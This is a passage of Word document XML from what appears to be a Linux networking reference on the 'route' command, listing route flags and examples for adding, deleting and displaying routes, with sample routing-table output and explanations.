    <w:p w14:paraId="6BB6E2EE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Delete a route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CACFC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>flush</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Flush routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F5285F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AA2C5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Route is up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E34CBD" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Use gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903BB15" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Target is a host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D1F53" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Reinstate route for dynamic routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21176F06" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Dynamically installed by daemon or redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0AF1AE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Modified from routing daemon or redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6520B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Installed by addrconf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E61B74" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Cache entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B81878" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Reject route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F7993" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:lastRenderedPageBreak/>
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137EF44" w14:textId="4BB4AB51" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E2EF13"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route -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA90E8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1495E86E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t>Kernel IP routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560276C3"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Destination     Gateway         Genmask         Flags Metric Ref    Use Iface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792F686"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0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C084ACC"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169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A3EF7"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192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE4ED1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE26D88" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Destination 0.0.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Default route (matches any destination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C90F0CC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gateway 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Next hop router for reaching destinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F727549" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Genmask</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Subnet mask (0.0.0.0 = catch-all, 255.255.255.0 = /24 network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A4DAE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags UG</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: U=route is up, G=use gateway (router)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752F617" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags U</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Direct route to local network (no gateway needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B776B9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metric</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Route priority (lower numbers preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D524AAE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ref</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Number of references to this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907ED3F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Count of lookups for this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00256348" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Iface</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Network interface to use for this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E6905" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>169.254.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Link-local network for auto-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFB093" w14:textId="44545086" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add default gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355AB67"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route add default gw 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D6A81" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Set default route for internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BD0C5" w14:textId="058E1B42" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Delete default gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325503B6"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route del default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C378F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Remove default route for network reconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C25A3" w14:textId="6E088AA3" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add network route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ECE35E"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route add -net 10.0.0.0/8 gw 192.168.1.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB4F03" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Route specific network through different gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B72F2F8" w14:textId="3A99D9E4" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add host route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DFD581"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route add -host 8.8.8.8 gw 192.168.1.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EA5A7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Route specific host through different path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5F82B" w14:textId="16FB23DD" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Delete specific route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E773E"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route del -net 10.0.0.0/8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F715565" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Remove incorrect or outdated routing entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5F5A8" w14:textId="2C763AF1" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add route with metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E1283"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route add -net 172.16.0.0/12 gw 192.168.1.254 metric 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8F552" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Set route priority for load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18181A71" w14:textId="4BCC0702" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Block network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBB17BF"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route add -net 192.168.100.0/24 reject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AEB27" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Block access to specific network segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C1F3F" w14:textId="14747585" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add route through interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F772E6"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route add -net 169.254.0.0/16 dev eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FFD88B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Direct traffic to interface without gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623110F" w14:textId="40D38F95" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:lastRenderedPageBreak/>
        <w:t>Display routing cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5227A5"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route -C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E6BD3" w14:textId="14CB6673" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F2473"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Kernel IP routing cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA62F89"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Source          Destination     Gateway         Flags Metric Ref    Use Iface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009A5ED" w14:textId="5FFC096B"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192.168.1.100   8.8.8.8         192.168.1.1     0     0      0        1 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74375ACD" w14:textId="4E58D19B" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF0D0A4" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing cache</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Shows cached routing decisions made by kernel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3A35C" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: 192.168.1.100 is the local source address used. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889B4D0" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Destination</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: 8.8.8.8 (Google DNS) is the target being reached. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856DA14" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
